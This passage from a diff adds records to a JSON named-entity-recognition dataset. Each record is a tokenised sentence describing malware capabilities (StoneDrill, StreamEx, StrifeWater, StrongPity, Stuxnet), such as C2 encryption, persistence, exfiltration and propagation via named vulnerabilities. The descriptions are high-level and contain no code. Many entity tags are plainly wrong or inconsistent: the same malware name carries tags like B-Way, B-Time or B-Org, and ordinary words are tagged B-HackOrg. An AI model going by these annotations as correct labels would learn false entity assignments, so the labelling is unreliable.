"alphabet-based", + "table", + "or", + "XOR", + "encryption." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StoneDrill", + "has", + "been", + "observed", + "deleting", + "the", + "temporary", + "files", + "once", + "they", + "fulfill", + "their", + "task." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StoneDrill", + "has", + "downloaded", + "and", + "dropped", + "temporary", + "files", + "containing", + "scripts;", + "it", + "additionally", + "has", + "a", + "function", + "to", + "upload", + "files", + "from", + "the", + "victims", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StoneDrill", + "has", + "relied", + "on", + "injecting", + "its", + "payload", + "directly", + "into", + "the", + "process", + "memory", + "of", + "the", + "victim's", + "preferred", + "browser." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StoneDrill", + "has", + "looked", + "in", + "the", + "registry", + "to", + "find", + "the", + "default", + "browser", + "path." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StoneDrill", + "can", + "take", + "screenshots." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "StoneDrill", + "can", + "check", + "for", + "antivirus", + "and", + "antimalware", + "programs." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StoneDrill", + "has", + "the", + "capability", + "to", + "discover", + "the", + "system", + "OS,", + "Windows", + "version,", + "architecture", + "and", + "environment." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StoneDrill", + "can", + "obtain", + "the", + "current", + "date", + "and", + "time", + "of", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StoneDrill", + "has", + "used", + "several", + "anti-emulation", + "techniques", + "to", + "prevent", + "automated", + "analysis", + "by", + "emulators", + "or", + "sandboxes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StoneDrill", + "has", + "several", + "VBS", + "scripts", + "used", + "throughout", + "the", + "malware's", + "lifecycle." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StoneDrill", + "has", + "used", + "the", + "WMI", + "command-line", + "(WMIC)", + "utility", + "to", + "run", + "tasks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StreamEx", + "has", + "the", + "ability", + "to", + "enumerate", + "drive", + "types." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "StreamEx", + "has", + "the", + "ability", + "to", + "modify", + "the", + "Registry." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "StreamEx", + "obfuscates", + "some", + "commands", + "by", + "using", + "statically", + "programmed", + "fragments", + "of", + "strings", + "when", + "starting", + "a", + "DLL.", + "It", + "also", + "uses", + "a", + "one-byte", + "xor", + "against", + "0x91", + "to", + "encode", + "configuration", + "data." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StreamEx", + "has", + "the", + "ability", + "to", + "enumerate", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "StreamEx", + "uses", + "rundll32", + "to", + "call", + "an", + "exported", + "function." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StreamEx", + "has", + "the", + "ability", + "to", + "scan", + "for", + "security", + "tools", + "such", + "as", + "firewalls", + "and", + "antivirus", + "tools." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "StreamEx", + "has", + "the", + "ability", + "to", + "enumerate", + "system", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "StreamEx", + "has", + "the", + "ability", + "to", + "remotely", + "execute", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "StreamEx", + "establishes", + "persistence", + "by", + "installing", + "a", + "new", + "service", + "pointing", + "to", + "its", + "DLL", + "and", + "setting", + "the", + "service", + "to", + "auto-start." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrifeWater", + "can", + "collect", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrifeWater", + "can", + "send", + "data", + "and", + "files", + "from", + "a", + "compromised", + "host", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrifeWater", + "can", + "self", + "delete", + "to", + "cover", + "its", + "tracks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "StrifeWater", + "can", + "enumerate", + "files", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrifeWater", + "can", + "download", + "updates", + "and", + "auxiliary", + "modules." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrifeWater", + "has", + "been", + "named", + "`calc.exe`", + "to", + "appear", + "as", + "a", + "legitimate", + "calculator", + "program." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrifeWater", + "can", + "use", + "a", + "variety", + "of", + "APIs", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "StrifeWater", + "has", + "create", + "a", + "scheduled", + "task", + "named", + "`Mozilla\\Firefox", + "Default", + "Browser", + "Agent", + "409046Z0FF4A39CB`", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrifeWater", + "has", + "the", + "ability", + "to", + "take", + "screen", + "captures." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "StrifeWater", + "can", + "encrypt", + "C2", + "traffic", + "using", + "XOR", + "with", + "a", + "hard", + "coded", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrifeWater", + "can", + "collect", + "the", + "OS", + "version,", + "architecture,", + "and", + "machine", + "name", + "to", + "create", + "a", + "unique", + "token", + "for", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrifeWater", + "can", + "collect", + "the", + "user", + "name", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrifeWater", + "can", + "collect", + "the", + "time", + "zone", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrifeWater", + "can", + "modify", + "its", + "sleep", + "time", + "responses", + "from", + "the", + "default", + "of", + "20-22", + "seconds." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrifeWater", + "can", + "execute", + "shell", + "commands", + "using", + "`cmd.exe`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "compress", + "and", + "encrypt", + "archived", + "files", + "into", + "multiple", + ".sft", + "files", + "with", + "a", + "repeated", + "xor", + "encryption", + "scheme." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "has", + "encrypted", + "C2", + "traffic", + "using", + "SSL/TLS." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "StrongPity", + "has", + "a", + "file", + "searcher", + "component", + "that", + "can", + "automatically", + "collect", + "and", + "archive", + "files", + "based", + "on", + "a", + "predefined", + "list", + "of", + "file", + "extensions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "automatically", + "exfiltrate", + "collected", + "documents", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "has", + "been", + "signed", + "with", + "self-signed", + "certificates." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "add", + "directories", + "used", + "by", + "the", + "malware", + "to", + "the", + "Windows", + "Defender", + "exclusions", + "list", + "to", + "prevent", + "detection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "has", + "used", + "encrypted", + "strings", + "in", + "its", + "dropper", + "component." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "exfiltrate", + "collected", + "documents", + "through", + "C2", + "channels." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "delete", + "previously", + "exfiltrated", + "files", + "from", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "parse", + "the", + "hard", + "drive", + "on", + "a", + "compromised", + "host", + "to", + "identify", + "specific", + "file", + "extensions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "has", + "the", + "ability", + "to", + "hide", + "the", + "console", + "window", + "for", + "its", + "document", + "search", + "module", + "from", + "the", + "user." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "download", + "files", + "to", + "specified", + "targets." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "has", + "been", + "executed", + "via", + "compromised", + "installation", + "files", + "for", + "legitimate", + "software", + "including", + "compression", + "applications,", + "security", + "software,", + "browsers,", + "file", + "recovery", + "applications,", + "and", + "other", + "tools", + "and", + "utilities." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "I-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "has", + "named", + "services", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "has", + "been", + "bundled", + "with", + "legitimate", + "software", + "installation", + "files", + "for", + "disguise." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "use", + "multiple", + "layers", + "of", + "proxy", + "servers", + "to", + "hide", + "terminal", + "nodes", + "in", + "its", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "has", + "used", + "HTTPS", + "over", + "port", + "1402", + "in", + "C2", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "use", + "PowerShell", + "to", + "add", + "files", + "to", + "the", + "Windows", + "Defender", + "exclusions", + "list." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "determine", + "if", + "a", + "user", + "is", + "logged", + "in", + "by", + "checking", + "to", + "see", + "if", + "explorer.exe", + "is", + "running." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "use", + "the", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "Registry", + "key", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "identify", + "if", + "ESET", + "or", + "BitDefender", + "antivirus", + "are", + "installed", + "before", + "dropping", + "its", + "payload." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "install", + "a", + "service", + "to", + "execute", + "itself", + "as", + "a", + "service." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "identify", + "the", + "hard", + "disk", + "volume", + "serial", + "number", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "identify", + "the", + "IP", + "address", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "can", + "use", + "HTTP", + "and", + "HTTPS", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StrongPity", + "has", + "created", + "new", + "services", + "and", + "modified", + "existing", + "services", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "encrypts", + "exfiltrated", + "data", + "via", + "C2", + "with", + "static", + "31-byte", + "long", + "XOR", + "keys." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "used", + "a", + "digitally", + "signed", + "driver", + "with", + "a", + "compromised", + "Realtek", + "certificate." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "infected", + "WinCC", + "machines", + "via", + "a", + "hardcoded", + "database", + "server", + "password." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "decrypts", + "resources", + "that", + "are", + "loaded", + "into", + "memory", + "and", + "executed." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "enumerates", + "user", + "accounts", + "of", + "the", + "domain." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "attempts", + "to", + "access", + "network", + "resources", + "with", + "a", + "domain", + "account’s", + "credentials." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "injects", + "an", + "entire", + "DLL", + "into", + "an", + "existing,", + "newly", + "created,", + "or", + "preselected", + "trusted", + "process." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "uses", + "encrypted", + "configuration", + "blocks", + "and", + "writes", + "encrypted", + "files", + "to", + "disk." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "checks", + "for", + "specific", + "operating", + "systems", + "on", + "32-bit", + "machines,", + "Registry", + "keys,", + "and", + "dates", + "for", + "vulnerabilities,", + "and", + "will", + "exit", + "execution", + "if", + "the", + "values", + "are", + "not", + "met." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "sends", + "compromised", + "victim", + "information", + "via", + "HTTP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Stuxnet", + "used", + "MS10-073", + "and", + "an", + "undisclosed", + "Task", + "Scheduler", + "vulnerability", + "to", + "escalate", + "privileges", + "on", + "local", + "Windows", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "propagates", + "using", + "the", + "MS10-061", + "Print", + "Spooler", + "and", + "MS08-067", + "Windows", + "Server", + "Service", + "vulnerabilities." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "I-Way", + "B-SecTeam", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "has", + "the", + "ability", + "to", + "generate", + "new", + "C2", + "domains." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Stuxnet", + "uses", + "an", + "RPC", + "server", + "that", + "contains", + "a", + "routine", + "for", + "file", + "deletion", + "and", + "also", + "removes", + "itself", + "from", + "the", + "system", + "through", + "a", + "DLL", + "export", + "by", + "deleting", + "specific", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Stuxnet", + "uses", + "a", + "driver", + "to", + "scan", + "for", + "specific", + "filesystem", + "driver", + "objects." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "reduces", + "the", + "integrity", + "level", + "of", + "objects", + "to", + "allow", + "write", + "actions." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "can", + "delete", + "OLE", + "Automation", + "and", + "SQL", + "stored", + "procedures", + "used", + "to", + "store", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "installs", + "an", + "RPC", + "server", + "for", + "P2P", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "uses", + "an", + "RPC", + "server", + "that", + "contains", + "a", + "file", + "dropping", + "routine", + "and", + "support", + "for", + "payload", + "version", + "updates", + "for", + "P2P", + "communications", + "within", + "a", + "victim", + "network." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "enumerates", + "user", + "accounts", + "of", + "the", + "local", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "can", + "create", + "registry", + "keys", + "to", + "load", + "driver", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "uses", + "the", + "SetSecurityDescriptorDacl", + "API", + "to", + "reduce", + "object", + "integrity", + "levels." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "enumerates", + "the", + "directories", + "of", + "a", + "network", + "resource." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "enumerates", + "removable", + "drives", + "for", + "infection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "searches", + "the", + "Registry", + "for", + "indicators", + "of", + "security", + "programs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "can", + "propagate", + "via", + "peer-to-peer", + "communication", + "and", + "updates", + "using", + "RPC." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Stuxnet", + "can", + "propagate", + "via", + "removable", + "media", + "using", + "an", + "autorun.inf", + "file", + "or", + "the", + "CVE-2010-2568", + "LNK", + "vulnerability." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "uses", + "a", + "Windows", + "rootkit", + "to", + "mask", + "its", + "binaries", + "and", + "other", + "relevant", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "propagates", + "to", + "available", + "network", + "shares." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "used", + "xp_cmdshell", + "to", + "store", + "and", + "execute", + "SQL", + "code." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "schedules", + "a", + "network", + "job", + "to", + "execute", + "two", + "minutes", + "after", + "host", + "infection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "enumerates", + "the", + "currently", + "running", + "processes", + "related", + "to", + "a", + "variety", + "of", + "security", + "products." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "calls", + "LoadLibrary", + "then", + "executes", + "exports", + "from", + "a", + "DLL." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "transforms", + "encrypted", + "binary", + "data", + "into", + "an", + "ASCII", + "string", + "in", + "order", + "to", + "use", + "it", + "as", + "a", + "URL", + "parameter", + "value." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "encodes", + "the", + "payload", + "of", + "system", + "information", + "sent", + "to", + "the", + "command", + "and", + "control", + "servers", + "using", + "a", + "one", + "byte", + "0xFF", + "XOR", + "key.", + "Stuxnet", + "also", + "uses", + "a", + "31-byte", + "long", + "static", + "byte", + "string", + "to", + "XOR", + "data", + "sent", + "to", + "command", + "and", + "control", + "servers.", + "The", + "servers", + "use", + "a", + "different", + "static", + "key", + "to", + "encrypt", + "replies", + "to", + "the", + "implant." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "collects", + "system", + "information", + "including", + "computer", + "and", + "domain", + "names,", + "OS", + "version,", + "and", + "S7P", + "paths." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "collects", + "the", + "IP", + "address", + "of", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "collects", + "the", + "time", + "and", + "date", + "of", + "a", + "system", + "when", + "it", + "is", + "infected." + ], + "ner_tags": 